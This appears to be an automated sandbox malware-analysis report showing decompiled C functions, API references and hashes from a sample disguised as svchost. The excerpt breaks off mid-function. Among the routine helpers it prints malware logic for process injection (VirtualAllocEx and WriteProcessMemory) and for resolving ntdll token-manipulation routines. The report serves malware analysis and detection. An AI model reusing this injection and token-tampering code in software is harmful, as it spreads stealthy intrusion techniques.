                                                                                0x0012888c
                                                                                0x0012888e
                                                                                0x0012889b
                                                                                0x0012889b
                                                                                0x001288a5
                                                                                0x00000000

                                                                                APIs
                                                                                • Sleep.KERNEL32(000003E8), ref: 001288A5
                                                                                  • Part of subcall function 0012F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0012E342,00000000,76A1F210,80000001,00000000,0012E513,?,00000000,00000000,?,000000E4), ref: 0012F089
                                                                                  • Part of subcall function 0012F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0012E342,00000000,76A1F210,80000001,00000000,0012E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0012F093
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$FileSystem$Sleep
                                                                                • String ID: localcfg$rresolv
                                                                                • API String ID: 1561729337-486471987
                                                                                • Opcode ID: 8161d7e00b03156da960b37192cd25656eea74d6a15109c73734038bb3897476
                                                                                • Instruction ID: c63f0e60fb16a7c1050a54e0ca7956ae62cb6a11fc85a18c8d9dba50c0bd5ecc
                                                                                • Opcode Fuzzy Hash: 8161d7e00b03156da960b37192cd25656eea74d6a15109c73734038bb3897476
                                                                                • Instruction Fuzzy Hash: 5421E4315493206AF314B7657D83F6E3AEDEB15720FA0042DF904960C3EFB5A9A082B6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00124000 Relevance: 4.5, APIs: 3, Instructions: 35sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00124000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}







                                                                                0x00124001
                                                                                0x00124006
                                                                                0x00124008
                                                                                0x0012400b
                                                                                0x00124021
                                                                                0x0012402a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012402c
                                                                                0x00124035
                                                                                0x00124052
                                                                                0x00000000
                                                                                0x0012403c
                                                                                0x0012403f
                                                                                0x00124059
                                                                                0x00000000
                                                                                0x0012405b
                                                                                0x00124046
                                                                                0x0012404c
                                                                                0x00124050
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124050
                                                                                0x00124035
                                                                                0x00124057
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,001322F8,001242B6,00000000,00000001,001322F8,00000000,?,001298FD), ref: 00124021
                                                                                • GetLastError.KERNEL32(?,001298FD,00000001,00000100,001322F8,0012A3C7), ref: 0012402C
                                                                                • Sleep.KERNEL32(000001F4,?,001298FD,00000001,00000100,001322F8,0012A3C7), ref: 00124046
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorFileLastSleep
                                                                                • String ID:
                                                                                • API String ID: 408151869-0
                                                                                • Opcode ID: 022ad9332d8ae613709ef17b6d0380d4585a19f5e5281caa92afae61b3883c43
                                                                                • Instruction ID: 68f5759faebe50439b18fc8729fe57be0492159d2bec965f3532ec5271183d76
                                                                                • Opcode Fuzzy Hash: 022ad9332d8ae613709ef17b6d0380d4585a19f5e5281caa92afae61b3883c43
                                                                                • Instruction Fuzzy Hash: DBF0A7312402116BD7364B28BC49B9A32A1FB85720F254B24F3B5E60E0C73058D19B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012DB67 Relevance: 4.5, APIs: 3, Instructions: 32filestringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012DB67(long _a4, long _a8, CHAR* _a12, CHAR* _a16) {
				char _v264;
				signed int _t13;
				void* _t17;
				CHAR* _t18;
				void* _t19;

				_t13 = GetEnvironmentVariableA(_a12,  &_v264, 0x104);
				if(_t13 == 0) {
					return _t13 | 0xffffffff;
				} else {
					_t18 = _t19 + _t13 - 0x104;
					if( *((char*)(_t18 - 1)) == 0x5c) {
						_t18 = _t19 + _t13 - 0x105;
						 *_t18 = 0;
					}
					lstrcpyA(_t18, _a16);
					_t17 = CreateFileA( &_v264, _a4, 1, 0, _a8, 0x80, 0); // executed
					return _t17;
				}
			}








                                                                                0x0012db7f
                                                                                0x0012db87
                                                                                0x0012dbce
                                                                                0x0012db89
                                                                                0x0012db89
                                                                                0x0012db94
                                                                                0x0012db96
                                                                                0x0012db9d
                                                                                0x0012db9d
                                                                                0x0012dba4
                                                                                0x0012dbc2
                                                                                0x0012dbc9
                                                                                0x0012dbc9

                                                                                APIs
                                                                                • GetEnvironmentVariableA.KERNEL32(0012DC19,?,00000104), ref: 0012DB7F
                                                                                • lstrcpyA.KERNEL32(?,001328F8), ref: 0012DBA4
                                                                                • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000080,00000000), ref: 0012DBC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEnvironmentFileVariablelstrcpy
                                                                                • String ID:
                                                                                • API String ID: 2536392590-0
                                                                                • Opcode ID: 15af1af5bacca64c32ed28aaa20e1258a42a9d08c1bab4e0760de0b40cb87a7d
                                                                                • Instruction ID: 94924df9cbd6fd8fffaa2e3f08d86bc8439997bf02f18cc4e91c59ca235f78e5
                                                                                • Opcode Fuzzy Hash: 15af1af5bacca64c32ed28aaa20e1258a42a9d08c1bab4e0760de0b40cb87a7d
                                                                                • Instruction Fuzzy Hash: 2CF0B470100209ABEF11DF64EC59FD93BA9BB14348F204194FB55A40D0D7F2D995CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012EC54 Relevance: 4.5, APIs: 3, Instructions: 24timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x1336cc = _t11;
				return _t11;
			}






                                                                                0x0012ec5e
                                                                                0x0012ec72
                                                                                0x0012ec84
                                                                                0x0012ec89
                                                                                0x0012ec8f

                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0012EC5E
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0012EC72
                                                                                • GetTickCount.KERNEL32 ref: 0012EC78
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$CountFileInformationSystemTickVolume
                                                                                • String ID:
                                                                                • API String ID: 1209300637-0
                                                                                • Opcode ID: 68d3bf02357f4425ea8b9fdcd0a76f307c6d336f0749b9cbf0450f8ed573632d
                                                                                • Instruction ID: d4054d800dbaf85568f970fe54431af38e034b2b8488932c47fd53d1e6d4553d
                                                                                • Opcode Fuzzy Hash: 68d3bf02357f4425ea8b9fdcd0a76f307c6d336f0749b9cbf0450f8ed573632d
                                                                                • Instruction Fuzzy Hash: C2E09AF5810104BFEB05ABB0DD5AE6B77FCEB08214F500650B911D64A0DA709A448B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 001230B5 Relevance: 3.0, APIs: 2, Instructions: 29networkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E001230B5() {
				char _v132;
				char* _t9;
				void* _t14;
				void* _t15;

				E0012EE2A(_t14,  &_v132, 0, 0x80);
				gethostname( &_v132, 0x80); // executed
				_t9 =  &_v132;
				__imp__#52(_t9, _t15); // executed
				if(_t9 == 0) {
					return 0;
				} else {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc))))));
				}
			}







                                                                                0x001230cb
                                                                                0x001230d8
                                                                                0x001230de
                                                                                0x001230e2
                                                                                0x001230eb
                                                                                0x001230f9
                                                                                0x001230ed
                                                                                0x001230f5
                                                                                0x001230f5

                                                                                APIs
                                                                                • gethostname.WS2_32(?,00000080), ref: 001230D8
                                                                                • gethostbyname.WS2_32(?), ref: 001230E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynamegethostname
                                                                                • String ID:
                                                                                • API String ID: 3961807697-0
                                                                                • Opcode ID: 83a9d47a095837eb79c59e0f0cb9fdf02d78cdb41a49e6f0228922f4b185857d
                                                                                • Instruction ID: 7b3afb5d4fb6e35f1aec6c925cc34463024e65255898959e6f4fbdc801a57d7a
                                                                                • Opcode Fuzzy Hash: 83a9d47a095837eb79c59e0f0cb9fdf02d78cdb41a49e6f0228922f4b185857d
                                                                                • Instruction Fuzzy Hash: 83E065719001299BCF009BA8EC89F8B77ECBB08304F080061F905E3250EA34E50487A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012EC2E Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012EC2E(void* _a4) {
				void* _t2;
				char _t5;
				void* _t7;

				_t7 = _a4;
				if(_t7 != 0) {
					E0012EBA0(_t7);
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _t7); // executed
					return _t5;
				}
				return _t2;
			}






                                                                                0x0012ec2f
                                                                                0x0012ec35
                                                                                0x0012ec38
                                                                                0x0012ec48
                                                                                0x00000000
                                                                                0x0012ec48
                                                                                0x0012ec4f

                                                                                APIs
                                                                                  • Part of subcall function 0012EBA0: GetProcessHeap.KERNEL32(00000000,00000000,0012EC0A,00000000,80000001,?,0012DB55,7FFF0001), ref: 0012EBAD
                                                                                  • Part of subcall function 0012EBA0: HeapSize.KERNEL32(00000000,?,0012DB55,7FFF0001), ref: 0012EBB4
                                                                                • GetProcessHeap.KERNEL32(00000000,0012EA27,00000000,0012EA27,00000000), ref: 0012EC41
                                                                                • RtlFreeHeap.NTDLL(00000000), ref: 0012EC48
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$FreeSize
                                                                                • String ID:
                                                                                • API String ID: 1305341483-0
                                                                                • Opcode ID: 78b66611c6ba1ea1a328695dbe96bd35767d88d4e7807a6fa3a78f315ddb9f56
                                                                                • Instruction ID: 67538eae45f11f7b0c6c50f71dc62bf541f4b8539a59d43b9ec8503110b92c7a
                                                                                • Opcode Fuzzy Hash: 78b66611c6ba1ea1a328695dbe96bd35767d88d4e7807a6fa3a78f315ddb9f56
                                                                                • Instruction Fuzzy Hash: 4DC012324066306BC5522750BC1DF9B6B98DF49712F090409F405661508760989046E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012EBCC Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012EBCC(long _a4) {
				void* _t3;
				void* _t7;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t3;
				E0012EB74(_t7);
				return _t7;
			}





                                                                                0x0012ebda
                                                                                0x0012ebe0
                                                                                0x0012ebe3
                                                                                0x0012ebec

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,80000001,0012EBFE,7FFF0001,?,0012DB55,7FFF0001), ref: 0012EBD3
                                                                                • RtlAllocateHeap.NTDLL(00000000,?,0012DB55,7FFF0001), ref: 0012EBDA
                                                                                  • Part of subcall function 0012EB74: GetProcessHeap.KERNEL32(00000000,00000000,0012EC28,00000000,?,0012DB55,7FFF0001), ref: 0012EB81
                                                                                  • Part of subcall function 0012EB74: HeapSize.KERNEL32(00000000,?,0012DB55,7FFF0001), ref: 0012EB88
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocateSize
                                                                                • String ID:
                                                                                • API String ID: 2559512979-0
                                                                                • Opcode ID: 548288ef3590879f12ef754dc08b6738c36cd0556f61ae333362d8cf02ccdbe4
                                                                                • Instruction ID: 8fc6b8cee8275288de93ca6ba7ea9dedc4d25efe114c6e4cb92e3340cb7e67bf
                                                                                • Opcode Fuzzy Hash: 548288ef3590879f12ef754dc08b6738c36cd0556f61ae333362d8cf02ccdbe4
                                                                                • Instruction Fuzzy Hash: 92C08C336086306BC60227A4BC0CE9A3ED8EF0C3A2F080004F609C2960CB30888087A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012F43E Relevance: 1.5, APIs: 1, Instructions: 33networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • recv.WS2_32(000000C8,?,00000000,0012CA44), ref: 0012F476
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: recv
                                                                                • String ID:
                                                                                • API String ID: 1507349165-0
                                                                                • Opcode ID: 83627207fccccd4427503f10920ec2326dba184b18a1ac8fe21b36340bc6c3cf
                                                                                • Instruction ID: 39830ca35329c2282a7cfca66dcb00adac66e9f69e8854df150730fb17dfd942
                                                                                • Opcode Fuzzy Hash: 83627207fccccd4427503f10920ec2326dba184b18a1ac8fe21b36340bc6c3cf
                                                                                • Instruction Fuzzy Hash: 39F01272201599ABDB11AE59EC84CAB3BADFB89350B050135FA14D7110D771D8618760
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00121978 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00121978(intOrPtr _a4, signed short _a8) {
				void* _t4;
				void* _t8;

				_t8 = 0;
				_t4 = E0012F428(_a4, _a8 & 0x0000ffff);
				if(_t4 > 0) {
					_t8 = 1; // executed
					__imp__#3(_t4); // executed
				}
				return _t8;
			}





                                                                                0x00121983
                                                                                0x00121985
                                                                                0x0012198e
                                                                                0x00121991
                                                                                0x00121992
                                                                                0x00121992
                                                                                0x0012199b

                                                                                APIs
                                                                                • closesocket.WS2_32(00000000), ref: 00121992
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesocket
                                                                                • String ID:
                                                                                • API String ID: 2781271927-0
                                                                                • Opcode ID: d195f59faca06a005e7432012b8ca13ca31fad63a1b43b64588108abd577a1c1
                                                                                • Instruction ID: d31c96be25bd0f8654fde4363a9fe0666f46eb4acfb1fd1dd900b56e5b75177b
                                                                                • Opcode Fuzzy Hash: d195f59faca06a005e7432012b8ca13ca31fad63a1b43b64588108abd577a1c1
                                                                                • Instruction Fuzzy Hash: CAD012261486327A96113759BC1587FABECDF59662B11843AFC48D0150D734CC928395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012DD84 Relevance: 1.3, APIs: 1, Instructions: 31stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012DD84(intOrPtr _a4, CHAR* _a8) {
				intOrPtr _t7;
				int _t10;
				intOrPtr* _t12;
				intOrPtr _t13;
				void* _t14;

				_t12 = 0x1320e4;
				_t14 =  *0x1320e4 - 0x1320e4; // 0x610f68
				if(_t14 == 0) {
					L6:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					_t7 = _a4;
					_t13 =  *_t12;
					if(_t7 == 0xffffffff ||  *((intOrPtr*)(_t13 + 0xc)) == _t7) {
						if(_a8 == 0) {
							L8:
							return _t13;
						}
						_t5 = _t13 + 0x10; // 0x80000011
						_t10 = lstrcmpiA(_t5, _a8); // executed
						if(_t10 == 0) {
							goto L8;
						}
					}
					_t12 =  *_t12;
				} while ( *_t12 != 0x1320e4);
				goto L6;
			}








                                                                                0x0012dd8c
                                                                                0x0012dd8e
                                                                                0x0012dd94
                                                                                0x0012ddc5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012dd96
                                                                                0x0012dd96
                                                                                0x0012dd96
                                                                                0x0012dd9a
                                                                                0x0012dd9f
                                                                                0x0012ddab
                                                                                0x0012ddcb
                                                                                0x00000000
                                                                                0x0012ddcb
                                                                                0x0012ddb1
                                                                                0x0012ddb5
                                                                                0x0012ddbd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ddbd
                                                                                0x0012ddbf
                                                                                0x0012ddc1
                                                                                0x00000000

                                                                                APIs
                                                                                • lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0012DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0012E3A7,000000F0), ref: 0012DDB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 1586166983-0
                                                                                • Opcode ID: 74f40d3dfdab2731e268a6c5afbe1f60cb96a40b3647e3ca4907cb4ed6dd940c
                                                                                • Instruction ID: 12b9619aed163569d6eb98e363865ee244640b6b347cbbc5ab57eb404ef410f5
                                                                                • Opcode Fuzzy Hash: 74f40d3dfdab2731e268a6c5afbe1f60cb96a40b3647e3ca4907cb4ed6dd940c
                                                                                • Instruction Fuzzy Hash: B9F08C35200A66CBCB24CEA4F884656B3E8EB85325F14493EE159D21D0D730DCA9CB11
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 0012637C Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4);
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0012EE08(_t15, _t32, _t26);
						_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40);
						if(_t37 == 0) {
							goto L5;
						} else {
							E001262B7(_v8, _t37);
							if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}









                                                                                0x00126384
                                                                                0x00126395
                                                                                0x0012639a
                                                                                0x001263a9
                                                                                0x001263af
                                                                                0x001263b4
                                                                                0x001263f5
                                                                                0x001263f5
                                                                                0x001263b6
                                                                                0x001263b9
                                                                                0x001263d0
                                                                                0x001263d4
                                                                                0x00000000
                                                                                0x001263d6
                                                                                0x001263da
                                                                                0x001263f3
                                                                                0x001263fc
                                                                                0x00126406
                                                                                0x0012640a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001263f3
                                                                                0x001263d4
                                                                                0x0012640f
                                                                                0x00126386
                                                                                0x00126389
                                                                                0x00126389

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00129816,EntryPoint), ref: 0012638F
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00129816,EntryPoint), ref: 001263A9
                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 001263CA
                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 001263EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 1965334864-0
                                                                                • Opcode ID: b81041bf5c8492fbd11bd98d085fd6c4137d84ec8d92a372933d9f48218a15ee
                                                                                • Instruction ID: fb8143a50bb949e0e4640a13093224fb2570f88beaa459d496322f78986a22ce
                                                                                • Opcode Fuzzy Hash: b81041bf5c8492fbd11bd98d085fd6c4137d84ec8d92a372933d9f48218a15ee
                                                                                • Instruction Fuzzy Hash: 241133B2600229BFDB259F65EC49F9B3FA8EB057A5F114024F909E7290E771DD508AA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00121000 Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00121000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				struct HINSTANCE__* _t17;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t33;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x133918; // 0x0
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x13391c == 0 ||  *0x133920 == 0 ||  *0x133924 == 0 ||  *0x133928 == 0 ||  *0x13392c == 0 ||  *0x133930 == 0 ||  *0x133934 == 0 ||  *0x133938 == 0 ||  *0x13393c == 0 ||  *0x133940 == 0 ||  *0x133944 == 0 ||  *0x133948 == 0 ||  *0x13394c == 0 ||  *0x133950 == 0 ||  *0x133954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x13391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t5 =  *0x133918; // 0x0
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
							 *0x133920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t25 =  *0x133918; // 0x0
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
								 *0x133924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t30 =  *0x133918; // 0x0
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress(_t30, "RtlFreeSid");
									 *0x133928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t9 =  *0x133918; // 0x0
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
										 *0x13392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t26 =  *0x133918; // 0x0
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
											 *0x133930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t31 =  *0x133918; // 0x0
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
												 *0x133934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t13 =  *0x133918; // 0x0
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
													 *0x133938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t27 =  *0x133918; // 0x0
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress(_t27, "NtClose");
														 *0x13393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t32 =  *0x133918; // 0x0
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
															 *0x133940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t17 =  *0x133918; // 0x0
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
																 *0x133944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t28 =  *0x133918; // 0x0
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
																	 *0x133948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t33 =  *0x133918; // 0x0
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress(_t33, "NtFilterToken");
																		 *0x13394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t21 =  *0x133918; // 0x0
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
																			 *0x133950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t29 =  *0x133918; // 0x0
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
																				 *0x133954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x133918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




































                                                                                0x00121000
                                                                                0x00121006
                                                                                0x0012100b
                                                                                0x00121023
                                                                                0x0012102a
                                                                                0x001210c2
                                                                                0x001210c4
                                                                                0x001210cb
                                                                                0x0012127b
                                                                                0x0012127b
                                                                                0x001210d1
                                                                                0x001210d1
                                                                                0x001210dc
                                                                                0x001210e1
                                                                                0x001210e3
                                                                                0x001210ea
                                                                                0x00000000
                                                                                0x001210f0
                                                                                0x001210f0
                                                                                0x001210fc
                                                                                0x00121101
                                                                                0x00121103
                                                                                0x0012110a
                                                                                0x00000000
                                                                                0x00121110
                                                                                0x00121110
                                                                                0x0012111c
                                                                                0x00121121
                                                                                0x00121123
                                                                                0x0012112a
                                                                                0x00000000
                                                                                0x00121130
                                                                                0x00121130
                                                                                0x0012113b
                                                                                0x00121140
                                                                                0x00121142
                                                                                0x00121149
